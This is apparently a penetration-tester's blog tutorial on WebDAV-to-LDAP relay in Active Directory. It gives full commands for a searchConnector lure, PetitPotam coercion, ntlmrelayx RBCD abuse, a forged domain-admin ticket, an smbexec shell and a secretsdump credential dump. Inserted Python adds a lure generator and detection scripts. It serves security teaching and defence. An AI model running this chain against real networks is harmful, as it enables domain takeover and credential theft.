WebDAV & LDAP Relay via MachineAccountQuota

Caleb
8 min read · Mar 17, 2025

WebDAV (Web Distributed Authoring and Versioning) is an extension of the HTTP protocol that enables users to collaboratively manage and edit files stored on web servers. In essence, it allows a server to function as a file system, giving users the ability to create, read, modify, and delete files or directories on the server remotely. This protocol is commonly used for file sharing and version control over the internet and is supported by various platforms, including SharePoint and other cloud-based services.

WebClient is the Windows service that lets Windows applications talk to WebDAV servers (the WebDAV redirector). When the WebClient service is running, users can map a WebDAV folder to a drive letter, so a server-hosted folder behaves like a local drive and files on it can be read and written as if stored locally, mirroring the experience of working with local files.

Historically, the WebClient service shipped enabled on Windows client editions. As of November 2023 Microsoft lists it as deprecated (Reference: https://learn.microsoft.com/en-us/windows/whats-new/deprecated-feature), and on current Windows systems it is not running by default: the service is still present and set to manual (trigger) start, so anything that asks for a WebDAV path can start it.

Despite this, it is not uncommon to find WebClient running on Windows workstations or even Windows servers (when the Desktop Experience is installed) in client environments.

Prerequisites

For this attack chain to work, the following conditions must be met:

  • The WebClient service must be running on the target host, or you must be able to start it.
  • You must be able to add a computer account, i.e. ms-DS-MachineAccountQuota must be greater than zero (the default is 10).
  • LDAP signing must not be required on the domain controller, and, if you relay to LDAPS, channel binding must not be enforced either (neither is enforced by default).
  • An authentication coercion technique must work against the target host.

Enumeration

You can use NetExec tool’s webdav module to enumerate hosts where the WebClient service is active:

nxc smb TARGET(S) -d FQDN -u USERNAME -p 'PASSWORD' -M webdav

If there are no hosts with the WebClient service running, you can force it to start using a .searchConnector-ms file. Please note that this technique requires user interaction.

First, as a low-privilege domain user (an assumed-breach scenario), enumerate the network shares on the target host that grant WRITE access:

nxc smb TARGET(S) -d FQDN -u USERNAME -p 'PASSWORD' --shares

Forced Authentication

Please note that if the target host already has the WebClient service running, the following steps can be skipped.

Once a share with WRITE access is identified on the target host, craft the payload below and save it as @test.searchConnector-ms. Explorer sorts names that begin with punctuation such as @ ahead of letters and digits, so the file lands at the top of the listing, where the victim's Explorer window renders it first.

<?xml version="1.0" encoding="UTF-8"?>
<searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector">
<description>Microsoft Outlook</description>
<isSearchOnlyItem>false</isSearchOnlyItem>
<includeInStartMenuScope>true</includeInStartMenuScope>
<templateInfo>
<folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType>
</templateInfo>
<simpleLocation>
<url>https://pentest/</url>
</simpleLocation>
</searchConnectorDescription>
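The payload above is static XML, but the same file can be generated and, on the defensive side, spotted programmatically. The following Python is an added example and not code from the article: it builds a search connector for an arbitrary location and scans a share listing for connector files that point at hosts outside an allow-list. The hosts (pentest, intranet) and file names are hypothetical; the folderType GUID is the one from the payload above.

```python
# Added example (not code from the article): build the .searchConnector-ms lure
# programmatically and, on the defensive side, pick out such lures in a share
# listing. Hosts ("pentest", "intranet") and file names are hypothetical.
import xml.etree.ElementTree as ET
from typing import Dict, List, Optional, Set, Tuple
from urllib.parse import urlparse

NS = "http://schemas.microsoft.com/windows/2009/searchConnector"
# folderType GUID taken from the article's payload
FOLDER_TYPE = "{91475FE5-586B-4EBA-8D75-D17434B8CDF6}"


def build_search_connector(url: str, description: str = "Microsoft Outlook") -> str:
    """Return the XML for a search connector whose location is `url`.
    Explorer resolves the location while rendering the folder that holds the
    file, which is enough to start WebClient on the viewer's machine."""
    root = ET.Element("searchConnectorDescription", xmlns=NS)
    ET.SubElement(root, "description").text = description
    ET.SubElement(root, "isSearchOnlyItem").text = "false"
    ET.SubElement(root, "includeInStartMenuScope").text = "true"
    template = ET.SubElement(root, "templateInfo")
    ET.SubElement(template, "folderType").text = FOLDER_TYPE
    location = ET.SubElement(root, "simpleLocation")
    ET.SubElement(location, "url").text = url
    return '<?xml version="1.0" encoding="UTF-8"?>\n' + ET.tostring(root, encoding="unicode")


def connector_url(xml_text: str) -> Optional[str]:
    """Extract simpleLocation/url from a connector file; None if missing or not XML."""
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError:
        return None
    node = root.find(f"{{{NS}}}simpleLocation/{{{NS}}}url")
    if node is None or not node.text:
        return None
    return node.text.strip()


def find_lure_connectors(files: Dict[str, str], allowed_hosts: Set[str]) -> List[Tuple[str, str]]:
    """Given {filename: content} from a writable share, return (name, host) for each
    connector (.searchConnector-ms, or .library-ms which behaves the same way) whose
    location points at a host that is not on the allow-list."""
    hits: List[Tuple[str, str]] = []
    for name, content in files.items():
        if not name.lower().endswith((".searchconnector-ms", ".library-ms")):
            continue
        url = connector_url(content)
        if url is None:
            continue
        host = (urlparse(url).hostname or "").lower()
        if host and host not in allowed_hosts:
            hits.append((name, host))
    return hits


if __name__ == "__main__":
    payload = build_search_connector("https://pentest/")
    with open("@test.searchConnector-ms", "w", encoding="utf-8") as fh:
        fh.write(payload)
    # constructed listing: the lure next to an ordinary document
    listing = {"@test.searchConnector-ms": payload, "budget.xlsx": ""}
    print(find_lure_connectors(listing, allowed_hosts={"intranet"}))
```

The scanner is the check a defender would run against writable shares: any connector whose location is not a known internal host is worth pulling, because a single-label host name in it is exactly what makes WebClient authenticate automatically.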

Once the payload is created, you can use the smbclient tool to connect to the network share and upload it:

smbclient -U FQDN/USERNAME%'PASSWORD' "\\\\TARGET_HOST\\SHARE"
put @test.searchConnector-ms
ls

Currently, the WebClient service is not running on the target host 192.168.56.22.

When a victim user browses to the network share containing the payload, the user does not need to click or open the @test.searchConnector-ms file. Merely opening the share (here, “all”) is enough, because Explorer resolves the connector's location while rendering the folder listing.

As a result, the WebClient service will start running on the target host.

Further Enumeration

The NetExec tool’s maq module can be used to enumerate MachineAccountQuota value:

nxc ldap DOMAIN_CONTROLLER -d FQDN -u USERNAME -p 'PASSWORD' -M maq

The MachineAccountQuota is an attribute in Active Directory that determines how many computer accounts an authenticated user can create in a domain. By default, this value is set to 10, meaning each user can join up to 10 computers to the domain without requiring additional permissions.

The NetExec tool’s ldap-checker module can be used to enumerate LDAP configurations:

nxc ldap DOMAIN_CONTROLLER -d FQDN -u USERNAME -p 'PASSWORD' -M ldap-checker

LDAP (Lightweight Directory Access Protocol) is an open, industry-standard protocol used to access and manage directory services. It enables systems to communicate with a directory service for tasks such as login authentication, querying user details, or retrieving information about networked devices.

LDAP signing ensures the integrity of LDAP traffic by digitally signing the data. This verifies the authenticity of the source and ensures that the data has not been tampered with during transmission.

Channel binding ties the application-layer authentication (LDAP over TLS) to the specific TLS session it travels in: the client includes a channel binding token derived from the TLS channel in its NTLM or Kerberos authentication, so credentials an attacker relays into a different TLS session are rejected. It complements signing, which only protects plain LDAP on port 389.

For the relay in this walkthrough (ntlmrelayx targeting ldap://), the domain controller must not require LDAP signing; if you relayed to ldaps:// instead, channel binding would have to be unenforced as well.

The NetExec tool’s coerce_plus module (an SMB module, since the coercion RPC interfaces are reached over SMB named pipes) enumerates the authentication coercion techniques the target host with WebClient enabled is vulnerable to:

nxc smb TARGET_HOST -d FQDN -u USERNAME -p 'PASSWORD' -M coerce_plus

Authentication coercion refers to techniques used by attackers to force a system or user to authenticate with an attacker-controlled resource. This is often employed to capture authentication credentials, such as Net-NTLM hashes, which can then be leveraged for further attacks, including credential relay or brute force cracking.

In this case, the target host is vulnerable to PetitPotam, PrinterBug, and MSEven authentication coercion techniques.

All prerequisites for WebDAV exploitation have been confirmed.

Exploitation

The NetExec tool’s add-computer module can be used to add a computer account via MachineAccountQuota as a low-privileged domain user:

nxc smb DOMAIN_CONTROLLER -d FQDN -u USERNAME  -p 'PASSWORD' -M add-computer -o NAME=PENTEST PASSWORD='PenetrationTest2025!'

Domain user accounts with a dollar sign ($) at the end of their name are computer accounts (also referred to as machine accounts). These accounts essentially represent computers in Active Directory. However, for simplicity, you can think of them as regular domain user accounts.

Notably, a computer account has write access to its own object in Active Directory, including the msDS-AllowedToActOnBehalfOfOtherIdentity attribute. That is what makes Resource-Based Constrained Delegation (RBCD) attacks possible here: when the target host’s machine account authentication is relayed to LDAP, the relayed session can set RBCD on the target’s own computer object.

To confirm access to the created computer account, use the following command:

nxc smb DOMAIN_CONTROLLER -d FQDN -u PENTEST$ -p 'PenetrationTest2025!'

For the LDAP relay to work, the coerced host must authenticate to the attacker machine with NTLM. The WebClient service only sends credentials automatically to names it treats as intranet (single-label names without dots), not to bare IP addresses, so the attacker machine needs a NetBIOS name or a DNS record. Creating a DNS record as a low-privileged domain user is possible via ADIDNS; this walkthrough uses the responder tool to answer for a NetBIOS name instead.

Install responder on the attacker machine and configure it:

sudo apt install responder -y
nano /usr/share/responder/Responder.conf

Set SMB and HTTP to Off so that ntlmrelayx can bind TCP 445 and 80 itself: the coerced WebDAV authentication arrives over HTTP on port 80 (the @80 in the PetitPotam listener string), and Responder would otherwise grab those ports and answer the request on its own. Leave the rest of the configuration unchanged.
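The edit to Responder.conf is two lines, but it is easy to forget one and then wonder why ntlmrelayx never sees the coerced authentication. The following Python is an added example (not the article’s own code): it reads a Responder.conf, reports listeners that would collide with ntlmrelayx, and writes the corrected file. CONSTRUCTED_CONF is a constructed excerpt using the real file’s section and key names; the path is an assumption for the Kali package.

```python
# Added example, not the article's own code: switch Responder's SMB and HTTP
# listeners off so ntlmrelayx can bind TCP 445 and 80, then verify nothing
# still collides. CONSTRUCTED_CONF is a constructed excerpt using the real
# file's section and key names; the path is an assumption for the Kali package.
import configparser
import io
from typing import Iterable, List

RESPONDER_CONF = "/usr/share/responder/Responder.conf"   # assumption: Kali package path
MUST_BE_OFF = ("SMB", "HTTP")   # ntlmrelayx needs 445 and 80 for this relay

CONSTRUCTED_CONF = """\
[Responder Core]

; Servers to start
SQL = On
SMB = On
RDP = On
Kerberos = On
FTP = On
POP = On
SMTP = On
IMAP = On
HTTP = On
HTTPS = On
DNS = On
LDAP = On
DCERPC = On
WinRM = On
SNMP = Off
MQTT = On

; Custom challenge.
Challenge = Random
"""


def _load(text: str) -> configparser.ConfigParser:
    cp = configparser.ConfigParser(interpolation=None)
    cp.optionxform = str            # keep "SMB"/"HTTP" capitalised as Responder expects
    cp.read_string(text)
    return cp


def relay_conflicts(text: str, services: Iterable[str] = MUST_BE_OFF) -> List[str]:
    """Listeners still 'On' that would fight ntlmrelayx for its ports."""
    cp = _load(text)
    return [s for s in services
            if cp.get("Responder Core", s, fallback="Off").strip().lower() == "on"]


def disable_for_relay(text: str, services: Iterable[str] = MUST_BE_OFF) -> str:
    """Return the config with the given listeners set to Off.
    Note: configparser drops ';' comment lines on write; keys and values survive."""
    cp = _load(text)
    for svc in services:
        cp.set("Responder Core", svc, "Off")
    out = io.StringIO()
    cp.write(out)
    return out.getvalue()


if __name__ == "__main__":
    with open(RESPONDER_CONF, encoding="utf-8") as fh:
        current = fh.read()
    clashing = relay_conflicts(current)
    if clashing:
        with open(RESPONDER_CONF, "w", encoding="utf-8") as fh:
            fh.write(disable_for_relay(current))
        print("turned off:", ", ".join(clashing))
    else:
        print("Responder.conf already leaves 445 and 80 free for ntlmrelayx")
```

Run it once before starting Responder; if it reports nothing to turn off, the file was already correct. If you want the comment lines preserved, make the two edits with sed instead and use relay_conflicts only as the check.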

Identify the appropriate network interface that allows you to connect to the target hosts.

Start responder:

responder -I INTERFACE

Above is the NetBIOS name assigned to the attacker machine.

Start the LDAP relay using the ntlmrelayx tool:

ntlmrelayx.py -t ldap://DOMAIN_CONTROLLER --delegate-access -smb2support --escalate-user PENTEST\$

Download an authentication coercion tool, PetitPotam:

wget https://raw.githubusercontent.com/topotam/PetitPotam/main/PetitPotam.py

Coerce authentication on the target host with the WebClient service running:

python3 PetitPotam.py -d FQDN -u USERNAME -p 'PASSWORD' NETBIOS_NAME@80/pentest TARGET_HOST

The coerced authentication is relayed to the domain controller’s LDAP service to configure the appropriate delegation rights for RBCD. LDAP relay succeeds because the domain controller does not enforce LDAP signing or channel binding.

Resource-Based Constrained Delegation (RBCD) lets the owner of a resource decide which accounts may delegate to it: the resource’s msDS-AllowedToActOnBehalfOfOtherIdentity attribute lists the principals allowed to obtain service tickets for that resource on behalf of other users. Whoever can write that attribute on an object can configure RBCD for it, and a machine account can write it on its own object; that is why relaying the target host’s machine authentication to LDAP lets ntlmrelayx grant PENTEST$ delegation rights on the target.

With those delegation rights, PENTEST$ can request service tickets to the target host on behalf of almost any domain user, including domain admins. The exceptions are accounts marked “Account is sensitive and cannot be delegated” and members of Protected Users, which the KDC refuses to delegate; if your first choice is protected, pick another privileged account.

To obtain the forged Kerberos ticket of a domain admin user on the target host:

getST.py -dc-ip DOMAIN_CONTROLLER -spn host/TARGET_HOST_FQDN -impersonate USER_TO_IMPERSONATE FQDN/'PENTEST$':'PenetrationTest2025!'

Please note that if the Administrator domain admin account is disabled, another enabled domain admin user can be impersonated.

Install the Kerberos client to allow the attacker machine to authenticate with the Key Distribution Center (KDC):

sudo apt install krb5-user -y

Import the forged Kerberos ticket:

export KRB5CCNAME=CCACHE_FILE
klist

With the forged Kerberos ticket, perform pass-the-ticket to gain a remote shell.

smbexec.py FQDN/IMPERSONATED_USER@TARGET_HOST_FQDN -k -no-pass

If name resolution fails at this point (Kerberos needs the target’s FQDN and the domain controller to resolve), point the attacker machine at the domain controller as its DNS server in /etc/resolv.conf:

sudo nano /etc/resolv.conf

The following screenshot shows the remote shell obtained.

It is also possible to dump credentials using the forged Kerberos ticket.

secretsdump.py FQDN/IMPERSONATED_USER@TARGET_HOST_FQDN -k -no-pass

The following screenshot shows the successful SAM dump.

With the obtained local admin NTLM hash, pass-the-hash can be performed to confirm administrative access.

From here, you can attempt password spraying with the obtained local admin NTLM hash to exploit password reuse within the environment. Alternatively, you can escalate privileges further within the domain by dumping cached credentials from LSASS or LSA secrets or by performing token impersonation using processes running in the context of high-privileged users.

Recommendation

To prevent WebDAV exploitation, the following are recommended:

  • Disable the WebClient service on Windows systems that do not need WebDAV (set its startup type to Disabled rather than leaving it at manual trigger start).
  • Set ms-DS-MachineAccountQuota to 0 so that ordinary domain users cannot create computer accounts, and grant the right to join computers explicitly to the accounts that need it.
  • Require LDAP signing on domain controllers (LDAPServerIntegrity = 2 under HKLM\SYSTEM\CurrentControlSet\Services\NTDS\Parameters, or the “Domain controller: LDAP server signing requirements” policy) and enforce channel binding for LDAPS (LdapEnforceChannelBinding = 2), so relayed NTLM authentication cannot be used against the directory.
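Until those controls are in place, the chain leaves a recognisable trail in the event logs: WebClient entering the running state on a workstation (System 7036), a computer account created by an ordinary user (Security 4741 on the DC), and, the decisive one, a computer account writing msDS-AllowedToActOnBehalfOfOtherIdentity on its own object (Security 5136). The following Python is an added example, not from the article: detection logic run over constructed event records whose field names follow the real event schemas. The hosts, users and the PRIVILEGED set are hypothetical.

```python
# Added example (not from the article): detection logic for the chain above, run
# over constructed Windows event records. Field names follow the real event
# schemas (System 7036 for service state, Security 4741 for computer account
# creation, Security 5136 for directory object modification); hosts, users and
# the PRIVILEGED set are hypothetical.
import re
from typing import Dict, List, Set, Tuple

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
PRIVILEGED = {"Administrator"}     # assumption: accounts expected to manage computer objects

Finding = Tuple[str, str, str]     # (severity, rule, detail)

CONSTRUCTED_EVENTS: List[Dict[str, object]] = [
    # System log: WebClient started on a workstation (what the lure achieves)
    {"EventID": 7036, "Computer": "WS01.lab.local", "param1": "WebClient", "param2": "running"},
    # Security log on the DC: ordinary user created a computer account (MachineAccountQuota)
    {"EventID": 4741, "Computer": "DC01.lab.local", "SubjectUserName": "jdoe", "TargetUserName": "PENTEST$"},
    # The relayed WS01$ wrote RBCD onto its own object: the tell-tale of this relay
    {"EventID": 5136, "Computer": "DC01.lab.local", "SubjectUserName": "WS01$",
     "ObjectDN": "CN=WS01,CN=Computers,DC=lab,DC=local",
     "AttributeLDAPDisplayName": RBCD_ATTR, "OperationType": "%%14674"},   # %%14674 = Value Added
    # An RBCD change by an admin on another host: worth a look, not a relay signature
    {"EventID": 5136, "Computer": "DC01.lab.local", "SubjectUserName": "Administrator",
     "ObjectDN": "CN=SQL01,CN=Computers,DC=lab,DC=local",
     "AttributeLDAPDisplayName": RBCD_ATTR, "OperationType": "%%14674"},
    # Computer join by an admin: expected, no finding
    {"EventID": 4741, "Computer": "DC01.lab.local", "SubjectUserName": "Administrator", "TargetUserName": "WS02$"},
]


def _cn(dn: str) -> str:
    m = re.match(r"CN=([^,]+)", dn, re.IGNORECASE)
    return m.group(1) if m else ""


def _short_host(fqdn: str) -> str:
    return fqdn.split(".", 1)[0]


def evaluate(events: List[Dict[str, object]]) -> List[Finding]:
    """Apply the three rules to a list of event records, in log order."""
    findings: List[Finding] = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 7036 and ev.get("param1") == "WebClient" and ev.get("param2") == "running":
            findings.append(("info", "webclient-started", str(ev["Computer"])))
        elif eid == 4741:
            creator = str(ev.get("SubjectUserName", ""))
            if creator not in PRIVILEGED and not creator.endswith("$"):
                findings.append(("medium", "maq-computer-created", f"{creator} -> {ev.get('TargetUserName')}"))
        elif eid == 5136 and ev.get("AttributeLDAPDisplayName") == RBCD_ATTR:
            subject = str(ev.get("SubjectUserName", ""))
            dn = str(ev.get("ObjectDN", ""))
            # A computer account editing RBCD on its own object is how a relayed
            # machine authentication shows up; no admin workflow does this.
            if subject.endswith("$") and subject[:-1].lower() == _cn(dn).lower():
                findings.append(("high", "rbcd-self-write", f"{subject} -> {dn}"))
            else:
                findings.append(("medium", "rbcd-write", f"{subject} -> {dn}"))
    return findings


def relay_victims(events: List[Dict[str, object]]) -> Set[str]:
    """Hosts that both started WebClient and had RBCD written by their own account."""
    webclient_hosts: Set[str] = set()
    self_writes: Set[str] = set()
    for _severity, rule, detail in evaluate(events):
        if rule == "webclient-started":
            webclient_hosts.add(_short_host(detail).upper())
        elif rule == "rbcd-self-write":
            self_writes.add(detail.split(" -> ", 1)[0].rstrip("$").upper())
    return webclient_hosts & self_writes


if __name__ == "__main__":
    for finding in evaluate(CONSTRUCTED_EVENTS):
        print(*finding)
    print("likely relay victims:", relay_victims(CONSTRUCTED_EVENTS))
```

The self-write rule is the one to page on: 5136 for msDS-AllowedToActOnBehalfOfOtherIdentity requires the “Directory Service Changes” audit subcategory and a SACL on computer objects, so confirm both are enabled on the domain controllers before relying on it.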

Conclusion

Attackers can compromise Windows workstations and potentially servers (if Desktop Experience is installed) by exploiting WebDAV via LDAP relay using machine accounts.

Happy hacking!


Written by Caleb

Ethical Hacker & Exploit Dev
